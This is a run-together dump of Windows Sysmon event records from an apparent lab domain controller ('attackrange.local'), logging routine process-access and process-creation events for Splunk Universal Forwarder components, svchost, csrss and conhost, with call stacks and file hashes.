16:53:03.574{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D6F-603E-8EAA-00000000AD01}6600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.574{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.574{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.574{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.574{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.574{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D6F-603E-8EAA-00000000AD01}6600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.574{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D6F-603E-8EAA-00000000AD01}6600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002238008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.568{05ADC7E1-6D6F-603E-8EAA-00000000AD01}6600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002238007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.268{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39B7D82F7F055119C38CBDA6796D1A19,SHA256=9C5E836E965C5552113D859A240CF46E3B1D3131847DE566E7DD7AD0162C1F7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:03.184{05ADC7E1-6D6E-603E-8DAA-00000000AD01}1359613700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D6E-603E-8DAA-00000000AD01}13596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D6E-603E-8DAA-00000000AD01}13596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.997{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D6E-603E-8DAA-00000000AD01}13596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002237998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.998{05ADC7E1-6D6E-603E-8DAA-00000000AD01}13596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002238034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D70-603E-90AA-00000000AD01}15212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D70-603E-90AA-00000000AD01}15212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.874{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D70-603E-90AA-00000000AD01}15212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002238027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.873{05ADC7E1-6D70-603E-90AA-00000000AD01}15212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002238026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.387{05ADC7E1-6D70-603E-8FAA-00000000AD01}129684028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002238025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.294{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F6EAE52A1EC1734B433794CB000CB69,SHA256=3A986F56C41E1FCF7219DF6947CB9A7C1860F7D801652A49CDE5D749A5A41A03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.200{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D70-603E-8FAA-00000000AD01}12968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 